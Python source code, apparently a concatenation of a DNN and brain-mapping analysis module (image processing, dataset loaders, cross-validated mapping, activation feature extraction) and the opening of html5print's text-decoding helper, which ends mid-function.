image : ndarray, Tensor, PIL.Image
Image data after crop.
"""
self._check_image(image)
if isinstance(image, Image.Image):
image = image.crop(box)
else:
if image.ndim == 2:
image = image[box[1]:box[3], box[0]:box[2]]
else:
image = image[:, box[1]:box[3], box[0]:box[2]]
return image
def translate(self, image, bkg, startpoint, endpoint, stride):
"""
Translate image on a background based on given startpoint and stride,
        only one axis is supported for now.
Parameters
----------
image : ndarray, Tensor, PIL.Image
Image data.
bkg : ndarray, Tensor, PIL.Image
            Same type as image. Note that bkg must be bigger than image.
startpoint : tuple
The start point of translating in upper left position
as a (x_axis,y_axis)-tuple, horizontal:x_axis, vertical:y_axis.
endpoint : tuple
The end point of translating in upper left position
as a (x_axis,y_axis)-tuple (horizontal: x_axis; vertical: y_axis).
stride : int
Stride of each translation.
Return
------
image_tran : ndarray, Tensor, PIL.Image
            Image data after translating, with an extra first dimension of size n_stim.
"""
self._check_image(image)
self._check_image(bkg)
if type(image) != type(bkg):
raise TypeError("image and bkg must be the same type!")
if isinstance(image, np.ndarray):
if image.shape[1]>bkg.shape[1] | image.shape[2]>bkg.shape[2]:
raise ValueError("the size of bkg must bigger than image!")
#Juage axis
if startpoint[0] == endpoint[0]:
num = (endpoint[1]-startpoint[1])/stride
axis = 'Y'
elif startpoint[1] == endpoint[1]:
num = (endpoint[0]-startpoint[0])/stride
axis = 'X'
else:
raise ValueError("only support translating in one axis now!")
if int(num) - num != 0:
raise ValueError("length must be divisible by stride!")
#Start translating
num = int(num) + 1
image_tran = np.zeros((num, 3, bkg.shape[1], bkg.shape[2]))
for tr in range(num):
bkg_new = copy.deepcopy(bkg)
if axis == 'Y':
bkg_new[:, startpoint[0]+tr*stride:startpoint[0]+tr*stride+image.shape[1],
startpoint[1]:startpoint[1]+image.shape[2]] = image
else:
bkg_new[:, startpoint[0]:startpoint[0]+image.shape[1],
startpoint[1]+tr*stride:startpoint[1]+tr*stride+image.shape[2]] = image
image_tran[tr] = bkg_new
elif isinstance(image, Image.Image):
pass
else:
pass
return image_tran
def norm(self, image, ord):
"""
Calculate norms of the image by the following formula:
*sum(abs(image)**ord)**(1./ord)*
Parameters
----------
image : ndarray, Tensor, PIL.Image
Image data.
ord : int
The order of the norm.
Return
-------
norm : float
The norm of the image.
"""
image = self.to_array(image)
norm = np.linalg.norm(image.ravel(), ord)
return norm
def total_variation(self, image):
"""
Calculate total variation of the image.
Parameters
----------
image : ndarray, Tensor, PIL.Image
Image data.
Return
------
tv : float
Total variation.
"""
image = self.to_array(image)
# calculate the difference of neighboring pixel-values
if image.ndim == 3:
diff1 = image[:, 1:, :] - image[:, :-1, :]
diff2 = image[:, :, 1:] - image[:, :, :-1]
else:
diff1 = image[1:, :] - image[:-1, :]
diff2 = image[:, 1:] - image[:, :-1]
# calculate the total variation
tv = np.sum(np.abs(diff1)) + np.sum(np.abs(diff2))
return tv
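# Illustrative example for ImageProcessor.total_variation (not from the original source):
# >>> ip = ImageProcessor()
# >>> ip.total_variation(np.array([[0., 1.], [2., 3.]]))
# 6.0
# i.e. the summed absolute vertical differences (2 + 2) plus the summed absolute
# horizontal differences (1 + 1).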
class ImageSet:
"""
Build a dataset to load image.
"""
def __init__(self, img_dir, img_ids, labels=None, transform=None):
"""
Initialize ImageSet
Parameters
----------
img_dir : str
Images' parent directory.
img_ids : list
Each img_id is a path which can find the image file relative to img_dir.
labels : list
Each image's label.
transform : callable function
Optional transform to be applied on a stimulus.
"""
self.img_dir = img_dir
self.img_ids = img_ids
self.labels = np.ones(len(self.img_ids)) if labels is None else labels
self.labels = np.int64(self.labels)
self.transform = transforms.Compose([transforms.ToTensor()]) if transform is None else transform
def __len__(self):
"""
Return the number of images
"""
return len(self.img_ids)
def __getitem__(self, indices):
"""
Get image data and corresponding labels
Parameters
----------
        indices : int, list, slice
            Subscript indices
Returns
-------
        data : tensor image data with shape as (n_stim, n_chn, height, width)
labels : list image labels
"""
# check availability and do preparation
if isinstance(indices, int):
tmp_ids = [self.img_ids[indices]]
labels = [self.labels[indices]]
elif isinstance(indices, list):
tmp_ids = [self.img_ids[idx] for idx in indices]
labels = [self.labels[idx] for idx in indices]
elif isinstance(indices, slice):
tmp_ids = self.img_ids[indices]
labels = self.labels[indices]
else:
raise IndexError("only integer, slices (`:`) and list are valid indices")
# load data
data = torch.zeros(0)
for img_id in tmp_ids:
image = Image.open(pjoin(self.img_dir, img_id)).convert('RGB') # load image
image = self.transform(image) # transform image
image = torch.unsqueeze(image, 0)
data = torch.cat((data, image))
if data.shape[0] == 1:
data = data[0]
labels = labels[0] # len(labels) == 1
return data, labels
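# A hypothetical usage sketch for ImageSet (directory and file names are made up):
# >>> dataset = ImageSet('/data/stimuli', ['cat/001.jpg', 'dog/002.jpg'], labels=[0, 1])
# >>> data, labels = dataset[[0, 1]]
# >>> data.shape
# torch.Size([2, 3, H, W])    # (n_stim, n_chn, height, width), assuming both images share size H x W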
class VideoSet:
"""
Dataset for video data
"""
def __init__(self, vid_file, frame_nums, labels=None, transform=None):
"""
Parameters
----------
vid_file : str
Video data file.
frame_nums : list
Sequence numbers of the frames of interest.
labels : list
Each frame's label.
transform : pytorch transform
"""
self.vid_cap = cv2.VideoCapture(vid_file)
self.frame_nums = frame_nums
self.labels = np.ones(len(self.frame_nums)) if labels is None else labels
self.labels = np.int64(self.labels)
self.transform = transforms.Compose([transforms.ToTensor()]) if transform is None else transform
def __getitem__(self, indices):
"""
Get frame data and corresponding labels
Parameters
----------
indices : int, list, slice
Subscript indices
Returns
-------
data : tensor
            Frame data with shape as (n_stim, n_chn, height, width).
labels : list
Frame labels.
"""
# check availability and do preparation
if isinstance(indices, int):
tmp_nums = [self.frame_nums[indices]]
labels = [self.labels[indices]]
elif isinstance(indices, list):
tmp_nums = [self.frame_nums[idx] for idx in indices]
labels = [self.labels[idx] for idx in indices]
elif isinstance(indices, slice):
tmp_nums = self.frame_nums[indices]
labels = self.labels[indices]
else:
raise IndexError("only integer, slices (`:`) and list are valid indices")
# load data
data = torch.zeros(0)
for frame_num in tmp_nums:
# get frame
self.vid_cap.set(cv2.CAP_PROP_POS_FRAMES, frame_num-1)
_, frame = self.vid_cap.read()
frame = Image.fromarray(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))
frame = self.transform(frame) # transform frame
frame = torch.unsqueeze(frame, 0)
data = torch.cat((data, frame))
if data.shape[0] == 1:
data = data[0]
labels = labels[0] # len(labels) == 1
return data, labels
def __len__(self):
"""
Return the number of frames.
"""
return len(self.frame_nums)
def cross_val_confusion(classifier, X, y, cv=None):
"""
Evaluate confusion matrix and score from each fold of cross validation
Parameters
----------
classifier: classifier object
The object used to fit the data.
X : ndarray
Shape=(n_sample, n_feature).
y : ndarray
Shape=(n_sample,).
cv : int
The number of folds of the cross validation.
Returns
-------
conf_ms : list
Confusion matrices of the folds.
accuracies : list
Accuracies of the folds.
"""
assert getattr(classifier, "_estimator_type", None) == "classifier", \
"Estimator must be a classifier!"
# calculate CV metrics
conf_ms = []
accuracies = []
classifier = copy.deepcopy(classifier)
skf = StratifiedKFold(n_splits=cv)
for train_indices, test_indices in skf.split(X, y):
# fit and prediction
classifier.fit(X[train_indices], y[train_indices])
y_preds = classifier.predict(X[test_indices])
# calculate confusion matrix and accuracy
conf_m = confusion_matrix(y[test_indices], y_preds)
acc = np.sum(conf_m.diagonal()) / np.sum(conf_m)
# collection
conf_ms.append(conf_m)
accuracies.append(acc)
return conf_ms, accuracies
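# A minimal usage sketch (illustrative; the data is synthetic):
# >>> X = np.random.rand(100, 5)
# >>> y = np.random.randint(0, 2, 100)
# >>> conf_ms, accs = cross_val_confusion(LogisticRegression(), X, y, cv=5)
# >>> len(conf_ms), len(accs)
# (5, 5)
# Each element of conf_ms is the (n_label, n_label) confusion matrix of one fold and
# each element of accs the corresponding accuracy.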
def cross_val_scores(regressor, X, Y, scoring, cv=None, multi_trg_flag=True):
"""
Evaluate scores for each run of cross validation
Parameters
----------
regressor: regressor object
The estimator used to fit the data.
X : ndarray
Shape=(n_sample, n_feature).
Y : ndarray
Shape=(n_sample, n_target).
scoring : str | callable
see scoring of Regression at
https://scikit-learn.org/stable/modules/model_evaluation.html#common-cases-predefined-values
If is str, choices=(explained_variance, r2, correlation).
If is callable, the inputs and outputs should imitate scoring metrics in sklearn.
The input parameters should include y_true, y_pred, and multioutput at least.
cv : int
The number of runs of the cross validation.
multi_trg_flag : bool
        Whether the regressor is able to fit multiple targets at once or not.
Returns
-------
scores : ndarray
shape=(cv, n_target)
"""
assert getattr(regressor, "_estimator_type", None) == "regressor", \
"Estimator must be a regressor!"
regressor = copy.deepcopy(regressor)
# get scoring metric
if isinstance(scoring, str):
if scoring == 'r2':
scoring = r2_score
elif scoring == 'explained_variance':
scoring = explained_variance_score
elif scoring == 'correlation':
scoring = correlation_score
else:
raise ValueError("If scoring is str, choices=(explained_variance, r2, correlation).")
elif callable(scoring):
pass
else:
raise ValueError("Not supported scoring")
# calculate CV metrics
n_trg = Y.shape[1]
scores = np.zeros((cv, n_trg))
kf = KFold(n_splits=cv)
for cv_idx, indices in enumerate(kf.split(X, Y)):
time1 = time.time()
# prepare train and test data
train_indices, test_indices = indices
X_train = X[train_indices]
Y_train = Y[train_indices]
X_test = X[test_indices]
Y_test = Y[test_indices]
# calculate Y_pred
if multi_trg_flag:
regressor.fit(X_train, Y_train)
Y_pred = regressor.predict(X_test)
else:
Y_pred = np.zeros_like(Y_test)
for trg_idx in range(n_trg):
regressor.fit(X_train, Y_train[:, trg_idx])
Y_pred[:, trg_idx] = regressor.predict(X_test)
# calculate scores
scores[cv_idx] = scoring(Y_test, Y_pred, multioutput='raw_values')
print('Finish CV-{}/{}, cost {} seconds'.format(cv_idx + 1, cv,
time.time() - time1))
return scores
def gen_estimator_from_name(name):
"""
Generate sklearn estimator from name
Parameters
----------
name : str
name of estimator
Returns
-------
estimator : sklearn estimator
"""
if name == 'lrc':
estimator = LogisticRegression()
elif name == 'svc':
estimator = SVC(kernel='linear', C=0.025)
elif name == 'glm':
estimator = LinearRegression()
elif name == 'lasso':
estimator = Lasso()
else:
raise ValueError("Not supported estimator name: {}".format(name))
return estimator
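# For example (illustrative): gen_estimator_from_name('svc') returns
# SVC(kernel='linear', C=0.025), while an unknown name raises ValueError.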
class UnivariateMapping:
"""
    For each target, evaluate every feature's predictive ability
    and record the location, prediction score and model of the feature with the
    maximal predictive ability.
"""
def __init__(self, estimator=None, cv=5, scoring=None):
"""
Parameters
----------
estimator : str | sklearn estimator or pipeline
            If it is a str, it is the name of an estimator used to do the mapping. |br|
            Some optional names are listed below:
+------------+------------+--------------------------------+
| name | type | description |
+============+============+================================+
| lrc | classifier | Logistic Regression Classifier |
+------------+------------+--------------------------------+
| svc | classifier | C-Support Vector Classification|
+------------+------------+--------------------------------+
| glm | regressor | Ordinary least squares Linear |
| | | Regression |
+------------+------------+--------------------------------+
| lasso | regressor | Linear Model trained with L1 |
| | | prior as regularizer |
+------------+------------+--------------------------------+
*Note*: If name is 'corr', it just uses correlation rather than prediction.
cv : int
The number of cross validation folds.
scoring : str or callable
The method to evaluate the predictions on the test set.
"""
self.set_estimator(estimator)
self.set_cv(cv)
self.set_scoring(scoring)
def set_estimator(self, estimator):
"""
Parameters
----------
estimator : str | sklearn estimator or pipeline
            If it is a str, it is the name of an estimator used to do the mapping. |br|
            Some optional names are listed below:
+------------+------------+--------------------------------+
| name | type | description |
+============+============+================================+
| lrc | classifier | Logistic Regression Classifier |
+------------+------------+--------------------------------+
| svc | classifier | C-Support Vector Classification|
+------------+------------+--------------------------------+
| glm | regressor | Ordinary least squares Linear |
| | | Regression |
+------------+------------+--------------------------------+
| lasso | regressor | Linear Model trained with L1 |
| | | prior as regularizer |
+------------+------------+--------------------------------+
*Note*: If name is 'corr', it just uses correlation rather than prediction.
"""
if estimator is None:
return
elif isinstance(estimator, str):
if estimator == 'corr':
self.estimator = None
self.estimator_type = 'correlation'
else:
self.estimator = gen_estimator_from_name(estimator)
self.estimator_type = getattr(self.estimator, "_estimator_type")
else:
self.estimator = estimator
self.estimator_type = getattr(self.estimator, "_estimator_type")
if self.estimator_type not in ('classifier', 'regressor', 'correlation'):
raise ValueError("Not supported estimator type: {}".format(self.estimator_type))
def set_cv(self, cv):
"""
Parameters
----------
cv : int
The number of cross validation folds.
"""
self.cv = cv
def set_scoring(self, scoring):
"""
Parameters
----------
scoring : str or callable
The method to evaluate the predictions on the test set.
It depends on estimator type.
+----------------+----------------------------------------------+
| estimator type | Scoring description |
+================+==============================================+
| classifier | The evaluation method is fixed as accuracy |
| | and confusion matrix. |
+----------------+----------------------------------------------+
| regressor | Scoring parameters or strategies supported |
| | by **sklearn** in addition to 'correlation'. |
+----------------+----------------------------------------------+
| correlation | No evaluation method is needed. |
+----------------+----------------------------------------------+
"""
if scoring is None:
self.scoring = scoring
elif hasattr(self, 'estimator_type'):
if self.estimator_type == 'classifier':
print("The evaluation method of a classifier "
"is fixed as accuracy and confusion matrix.")
self.scoring = None
elif self.estimator_type == 'regressor':
if scoring == 'correlation':
self.scoring = correlation_scorer
else:
self.scoring = scoring
else:
print("correlation analysis doesn't need evaluation method.")
self.scoring = None
else:
raise ValueError("You have to set estimator first!")
def map(self, X, Y):
"""
Use all columns of **X** (one-by-one) to predict each column of **Y**;
For each column of Y:
Find the location of the column of X which has the maximal prediction score;
Record the location, and corresponding score and model.
Parameters
----------
X : ndarray
shape=(n_sample, n_feature)
Y : ndarray
shape=(n_sample, n_target)
Returns
-------
map_dict: dict
It depends on estimator type.
+------------+-----------+--------------------------------------------------------------+
| estimator | key | value |
| type | | |
+============+===========+==============================================================+
| classifier | score | An array with shape as (n_target, cv). |br| |
| | | Each row contains accuracies of each cross |br| |
| | | validation folds, when using the feature at the |br| |
| | | maximal location to predict the corresponding target. |
| +-----------+--------------------------------------------------------------+
| | location | An array with shape as (n_target,). |br| |
| | | Each element is a location of the feature |br| |
| | | which makes the maximal score. |
| +-----------+--------------------------------------------------------------+
| | model | An array with shape as (n_target,). |br| |
| | | Each element is a model fitted by the feature |br| |
| | | at the maximal location and the corresponding target. |
| +-----------+--------------------------------------------------------------+
| | conf_m | An array with shape as (n_target, cv). |br| |
| | | Each row contains confusion matrices |br| |
| | | (n_label, n_label) of each cross validation folds, |br| |
| | | when using the feature at the maximal location to |br| |
| | | predict the corresponding target. |
+------------+-----------+--------------------------------------------------------------+
| regressor | score | An array with shape as (n_target, cv). |br| |
| | | Each row contains scores of each cross |br| |
| | | validation folds, when using the feature at |br| |
| | | the maximal location to predict the corresponding target. |
| +-----------+--------------------------------------------------------------+
| | location | An array with shape as (n_target,). |br| |
| | | Each element is a location of the feature |br| |
| | | which makes the maximal score. |
| +-----------+--------------------------------------------------------------+
| | model | An array with shape as (n_target,). |br| |
| | | Each element is a model fitted by the feature |br| |
| | | at the maximal location and the corresponding target. |
+------------+-----------+--------------------------------------------------------------+
| correlation| score | An array with shape as (n_target,). |br| |
| | | Each element is the maximal pearson r among all |br| |
| | | features correlating to the corresponding target. |
| +-----------+--------------------------------------------------------------+
| | location | An array with shape as (n_target,). |br| |
| | | Each element is a location of the feature |br| |
| | | which makes the maximal score. |
+------------+-----------+--------------------------------------------------------------+
.. |br| raw:: html
<br/>
"""
assert X.ndim == 2, "X's shape must be (n_sample, n_feature)!"
assert Y.ndim == 2, "Y's shape must be (n_sample, n_target)!"
assert X.shape[0] == Y.shape[0], 'X and Y must have the ' \
'same number of samples!'
n_feat = X.shape[1]
n_trg = Y.shape[1]
# initialize mapping dict
        map_dict = {'location': np.zeros((n_trg,), dtype=int)}
        if self.estimator_type == 'classifier':
            map_dict['model'] = np.zeros((n_trg,), dtype=object)
            map_dict['score'] = np.zeros((n_trg, self.cv))
            map_dict['conf_m'] = np.zeros((n_trg, self.cv), dtype=object)
        elif self.estimator_type == 'regressor':
            map_dict['model'] = np.zeros((n_trg,), dtype=object)
map_dict['score'] = np.zeros((n_trg, self.cv))
else:
map_dict['score'] = np.zeros((n_trg,))
# do cross validation for each target
for trg_idx in range(n_trg):
time1 = time.time()
y = Y[:, trg_idx]
if self.estimator_type == 'correlation':
# calculate pearson r
scores_tmp = pairwise_distances(X.T, y.reshape(1, -1), 'correlation')
scores_tmp = 1 - scores_tmp.ravel()
# find maximal score and its location
max_feat_idx = np.nanargmax(scores_tmp)
map_dict['location'][trg_idx] = max_feat_idx
map_dict['score'][trg_idx] = scores_tmp[max_feat_idx]
elif self.estimator_type == 'regressor':
# cross validation
scores_cv = np.zeros((n_feat, self.cv))
for feat_idx in range(n_feat):
scores_cv[feat_idx] = cross_val_score(self.estimator, X[:, [feat_idx]], y,
scoring=self.scoring, cv=self.cv)
scores_tmp = np.mean(scores_cv, 1)
# find maximal score and its location
max_feat_idx = np.nanargmax(scores_tmp)
map_dict['location'][trg_idx] = max_feat_idx
map_dict['score'][trg_idx] = scores_cv[max_feat_idx]
map_dict['model'][trg_idx] = deepcopy(self.estimator.fit(X[:, [max_feat_idx]], y))
else:
# cross validation
scores_cv = np.zeros((n_feat, self.cv))
                conf_ms_cv = np.zeros((n_feat, self.cv), dtype=object)
for feat_idx in range(n_feat):
conf_ms, accs = cross_val_confusion(self.estimator, X[:, [feat_idx]], y, cv=self.cv)
scores_cv[feat_idx] = accs
conf_ms_cv[feat_idx] = conf_ms
scores_tmp = np.mean(scores_cv, 1)
# find maximal score and its location
max_feat_idx = np.nanargmax(scores_tmp)
map_dict['location'][trg_idx] = max_feat_idx
map_dict['score'][trg_idx] = scores_cv[max_feat_idx]
map_dict['conf_m'][trg_idx] = conf_ms_cv[max_feat_idx]
map_dict['model'][trg_idx] = deepcopy(self.estimator.fit(X[:, [max_feat_idx]], y))
print('Finish target {}/{} in {} seconds.'.format(trg_idx+1, n_trg, time.time()-time1))
return map_dict
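# A hypothetical end-to-end sketch for UnivariateMapping (shapes are made up):
# >>> X = np.random.rand(50, 10)    # 50 samples, 10 features
# >>> Y = np.random.rand(50, 3)     # 50 samples, 3 targets
# >>> um = UnivariateMapping(estimator='glm', cv=5, scoring='correlation')
# >>> map_dict = um.map(X, Y)
# >>> map_dict['location'].shape, map_dict['score'].shape
# ((3,), (3, 5))
# For each target, 'location' holds the index of the single best-predicting feature
# and 'score' the cross-validation scores obtained with that feature.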
class MultivariateMapping:
def __init__(self, estimator=None, cv=5, scoring=None):
"""
Parameters
----------
estimator : str | sklearn estimator or pipeline
            If it is a str, it is the name of an estimator used to do the mapping. |br|
            Some optional names are listed below:
+------------+------------+--------------------------------+
| name | type | description |
+============+============+================================+
| lrc | classifier | Logistic Regression Classifier |
+------------+------------+--------------------------------+
| svc | classifier | C-Support Vector Classification|
+------------+------------+--------------------------------+
| glm | regressor | Ordinary least squares Linear |
| | | Regression |
+------------+------------+--------------------------------+
| lasso | regressor | Linear Model trained with L1 |
| | | prior as regularizer |
+------------+------------+--------------------------------+
cv : int
The number of cross validation folds.
scoring : str or callable
The method to evaluate the predictions on the test set.
"""
self.set_estimator(estimator)
self.set_cv(cv)
self.set_scoring(scoring)
def set_estimator(self, estimator):
"""
Parameters
----------
estimator : str | sklearn estimator or pipeline
            If it is a str, it is the name of an estimator used to do the mapping. |br|
            Some optional names are listed below:
+------------+------------+--------------------------------+
| name | type | description |
+============+============+================================+
| lrc | classifier | Logistic Regression Classifier |
+------------+------------+--------------------------------+
| svc | classifier | C-Support Vector Classification|
+------------+------------+--------------------------------+
| glm | regressor | Ordinary least squares Linear |
| | | Regression |
+------------+------------+--------------------------------+
| lasso | regressor | Linear Model trained with L1 |
| | | prior as regularizer |
+------------+------------+--------------------------------+
"""
if estimator is None:
return
elif isinstance(estimator, str):
self.estimator = gen_estimator_from_name(estimator)
self.estimator_type = getattr(self.estimator, "_estimator_type")
else:
self.estimator = estimator
self.estimator_type = getattr(self.estimator, "_estimator_type")
if self.estimator_type not in ('classifier', 'regressor'):
raise ValueError("Not supported estimator type: {}".format(self.estimator_type))
def set_cv(self, cv):
"""
Parameters
----------
cv : int
The number of cross validation folds.
"""
self.cv = cv
def set_scoring(self, scoring):
"""
Parameters
----------
scoring : str or callable
The method to evaluate the predictions on the test set.
It depends on estimator type.
+----------------+----------------------------------------------+
| estimator type | Scoring description |
+================+==============================================+
| classifier | The evaluation method is fixed as accuracy |
| | and confusion matrix. |
+----------------+----------------------------------------------+
| regressor | Scoring parameters or strategies supported |
| | by **sklearn** in addition to 'correlation'. |
+----------------+----------------------------------------------+
"""
if scoring is None:
self.scoring = None
elif hasattr(self, 'estimator_type'):
if self.estimator_type == 'classifier':
print("The evaluation method of a classifier "
"is fixed as accuracy and confusion matrix.")
self.scoring = None
else:
self.scoring = scoring
else:
raise ValueError("You have to set estimator first!")
def map(self, X, Y):
"""
Use all columns of X to predict each column of Y.
Parameters
----------
X : ndarray
shape=(n_sample, n_feature)
Y : ndarray
shape=(n_sample, n_target)
Returns
-------
map_dict: dict
It depends on estimator type.
+------------+-----------+--------------------------------------------------------------+
| estimator | key | value |
| type | | |
+============+===========+==============================================================+
| classifier | score | An array with shape as (n_target, cv). |br| |
| | | Each row contains accuracies of each cross |br| |
| | | validation folds, when using all features to |br| |
| | | predict the corresponding target. |
| +-----------+--------------------------------------------------------------+
| | model | An array with shape as (n_target,). |br| |
| | | Each element is a model fitted by all features |br| |
| | | and the corresponding target. |
| +-----------+--------------------------------------------------------------+
| | conf_m | An array with shape as (n_target, cv). |br| |
| | | Each row contains confusion matrices |br| |
| | | (n_label, n_label) of each cross validation |br| |
| | | folds, when using all features to predict the |br| |
| | | corresponding target. |
+------------+-----------+--------------------------------------------------------------+
| regressor | score | An array with shape as (n_target, cv). |br| |
| | | Each row contains scores of each cross |br| |
| | | validation folds, when using all features to |br| |
| | | predict the corresponding target. |
| +-----------+--------------------------------------------------------------+
| | model | An array with shape as (n_target,). |br| |
| | | Each element is a model fitted by all features |br| |
| | | and the corresponding target. |
+------------+-----------+--------------------------------------------------------------+
.. |br| raw:: html
<br/>
"""
assert X.ndim == 2, "X's shape must be (n_sample, n_feature)!"
assert Y.ndim == 2, "Y's shape must be (n_sample, n_target)!"
assert X.shape[0] == Y.shape[0], 'X and Y must have the ' \
'same number of samples!'
n_trg = Y.shape[1]
# initialize prediction dict
        map_dict = {'model': np.ones((n_trg,), dtype=object) * 'm'}
print('Start mapping:')
time1 = time.time()
if self.estimator_type == 'classifier':
map_dict['score'] = np.zeros((n_trg, self.cv))
            map_dict['conf_m'] = np.zeros((n_trg, self.cv), dtype=object)
for trg_idx in range(n_trg):
time2 = time.time()
y = Y[:, trg_idx]
conf_ms, scores_tmp = cross_val_confusion(self.estimator, X, y, self.cv)
map_dict['conf_m'][trg_idx] = conf_ms
map_dict['score'][trg_idx] = scores_tmp
map_dict['model'][trg_idx] = deepcopy(self.estimator.fit(X, y))
print('Finish target {}/{} in {} seconds.'.format(
trg_idx + 1, n_trg, time.time() - time2))
else:
# multi-target flag
multi_trg_flag = True
try:
Y_tmp = np.c_[Y[:, [0]], Y[:, [0]]] # for fear that n_target is 1
self.estimator.fit(X, Y_tmp)
del Y_tmp
except ValueError:
multi_trg_flag = False
print('multi-target flag is', multi_trg_flag)
scores_tmp = cross_val_scores(self.estimator, X, Y,
self.scoring, self.cv, multi_trg_flag)
# recording
map_dict['score'] = scores_tmp.T
if multi_trg_flag:
map_dict['model'][0] = deepcopy(self.estimator.fit(X, Y))
else:
for trg_idx in range(n_trg):
map_dict['model'][trg_idx] = deepcopy(self.estimator.fit(X, Y[:, trg_idx]))
print('Finish mapping in {} seconds.'.format(time.time() - time1))
return map_dict
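# A hypothetical sketch for MultivariateMapping (shapes are made up):
# >>> mm = MultivariateMapping(estimator='glm', cv=5, scoring='correlation')
# >>> map_dict = mm.map(np.random.rand(50, 10), np.random.rand(50, 3))
# >>> map_dict['score'].shape
# (3, 5)
# Since LinearRegression can fit several targets at once, only map_dict['model'][0]
# is filled with the fitted multi-target model in this case.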
def dnn_mask(dnn_acts, channels='all', rows='all', columns='all'):
"""
Extract DNN activation
Parameters
----------
dnn_acts : ndarray
DNN activation
A 4D array with its shape as (n_stim, n_chn, n_row, n_col).
channels: str, list
Channels of interest.
If is str, it must be 'all' which means all channels.
If is list, its elements are serial numbers of channels.
rows: str, list
rows of interest.
If is str, it must be 'all' which means all rows.
If is list, its elements are serial numbers of rows.
columns: str, list
Columns of interest.
If is str, it must be 'all' which means all columns.
If is list, its elements are serial numbers of columns.
Return
------
dnn_acts : ndarray
DNN activation after mask.
A 4D array with its shape as (n_stim, n_chn, n_row, n_col).
"""
if isinstance(channels, list):
channels = [chn-1 for chn in channels]
dnn_acts = dnn_acts[:, channels, :, :]
if isinstance(rows, list):
rows = [row-1 for row in rows]
dnn_acts = dnn_acts[:, :, rows, :]
if isinstance(columns, list):
columns = [col-1 for col in columns]
dnn_acts = dnn_acts[:, :, :, columns]
return dnn_acts
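# Illustrative example (not from the original source): channel/row/column numbers are
# 1-based serial numbers, so channels=[1, 3] keeps the 0-based indices 0 and 2.
# >>> acts = np.random.rand(10, 4, 5, 5)    # (n_stim, n_chn, n_row, n_col)
# >>> dnn_mask(acts, channels=[1, 3]).shape
# (10, 2, 5, 5)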
def dnn_fe(dnn_acts, method, n_feat, axis=None):
"""
Extract features of DNN activation
Parameters
----------
dnn_acts : ndarray
DNN activation.
A 4D array with its shape as (n_stim, n_chn, n_row, n_col).
method : str
Feature extraction method, choices: ('pca', 'hist', 'psd')
+------------+-------------------------------------------+
| method name| description |
+============+===========================================+
| pca |use n_feat principal components as features|
+------------+-------------------------------------------+
| hist |use histogram of activation as features |
+------------+-------------------------------------------+
| psd |use power spectral density as features |
+------------+-------------------------------------------+
*Note*: In 'hist', n_feat equal-width bins in the given range will be used!
n_feat : int, float
The number of features to extract.
*Note*: It can be a float only when the method is pca.
axis : str
axis for feature extraction, choices=(chn, row_col)
+----------+----------------------------------+
| axis | array shape |
+==========+==================================+
| chn | (n_stim, n_feat, n_row, n_col) |
+----------+----------------------------------+
| row_col | (n_stim, n_chn, n_feat, 1) |
+----------+----------------------------------+
| None | (n_stim, n_feat, 1, 1) |
+----------+----------------------------------+
*Note*: We always regard the shape of the result as (n_stim, n_chn, n_row, n_col)
Return
------
dnn_acts_new : ndarray
DNN activation.
A 4D array with its shape as (n_stim, n_chn, n_row, n_col).
"""
# adjust iterative axis
n_stim, n_chn, n_row, n_col = dnn_acts.shape
dnn_acts = dnn_acts.reshape((n_stim, n_chn, n_row*n_col))
if axis is None:
dnn_acts = dnn_acts.reshape((n_stim, 1, -1))
elif axis == 'chn':
dnn_acts = dnn_acts.transpose((0, 2, 1))
elif axis == 'row_col':
pass
else:
raise ValueError('not supported axis:', axis)
_, n_iter, _ = dnn_acts.shape
# extract features
if method == 'pca':
dnn_acts_new = []
pca = PCA(n_components=n_feat)
for i in range(n_iter):
dnn_acts_new.append(pca.fit_transform(dnn_acts[:, i, :]))
dnn_acts_new = np.asarray(dnn_acts_new).transpose((1, 0, 2))
elif method == 'hist':
dnn_acts_new = np.zeros((n_stim, n_iter, n_feat))
for i in range(n_iter):
for j in range(n_stim):
dnn_acts_new[j, i, :] = np.histogram(dnn_acts[j, i, :], n_feat)[0]
elif method == 'psd':
dnn_acts_new = np.zeros((n_stim, n_iter, n_feat))
for i in range(n_iter):
for j in range(n_stim):
f, p = periodogram(dnn_acts[j, i, :])
dnn_acts_new[j, i, :] = p[:n_feat]
else:
raise ValueError('not supported method:', method)
# adjust iterative axis
if axis is None:
dnn_acts_new = dnn_acts_new.transpose((0, 2, 1))
dnn_acts_new = dnn_acts_new[:, :, :, None]
elif axis == 'chn':
dnn_acts_new = dnn_acts_new.transpose((0, 2, 1))
dnn_acts_new = dnn_acts_new.reshape((n_stim, n_feat, n_row, n_col))
else:
dnn_acts_new = dnn_acts_new[:, :, :, None]
return dnn_acts_new
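# A minimal sketch for dnn_fe (illustrative):
# >>> acts = np.random.rand(20, 64, 7, 7)          # (n_stim, n_chn, n_row, n_col)
# >>> dnn_fe(acts, 'pca', 5).shape                 # axis=None: features over the whole map
# (20, 5, 1, 1)
# >>> dnn_fe(acts, 'hist', 8, axis='chn').shape    # histogram features along channels
# (20, 8, 7, 7)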
ip = ImageProcessor()
|
# -*- coding: utf-8 -*-
#
# Copyright 2014 Bernard Yue
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import unicode_literals, absolute_import
import os
import sys
import re
import types
import warnings
try:
import chardet as cdetector
except ImportError:
try:
import cchardet as cdetector
except ImportError:
print('Requires either chardet or cchardet module')
raise
def decodeText(text, encoding=None):
"""Decoding `text` to `encoding`. If `encoding` is None, encoding
will be guessed.
**Note**: `encoding` provided will be disregarded if it causes decoding
error
:param text: string to be decoded
:param encoding: encoding scheme of `text`. guess by system if None
:returns: new decoded text as unicode
>>> import sys
>>> from html5print import decodeText
>>> s = 'Hello! 您好! こんにちは! halló!'
>>> output = decodeText(s)
>>> print(output)
Hello! 您好! こんにちは! halló!
>>> if sys.version_info[0] >= 3:
... unicode = str
>>> isinstance(output, unicode)
True
"""
# if `text` is unicode, not much to convert
if isUnicode(text):
return text
# Now for non unicode text, try decode with provided encoding
if encoding:
try:
text = text.decode(encoding, 'strict')
except (UnicodeEncodeError, UnicodeDecodeError) as e:
# incorrect `encoding` set by caller, so let's guess first
warnings.warn(str(e))
else:
return text
# no encoding or decoding with provided `encoding` failed
detected = cdetector.detect(text)
detectedEncoding = detected['encoding']
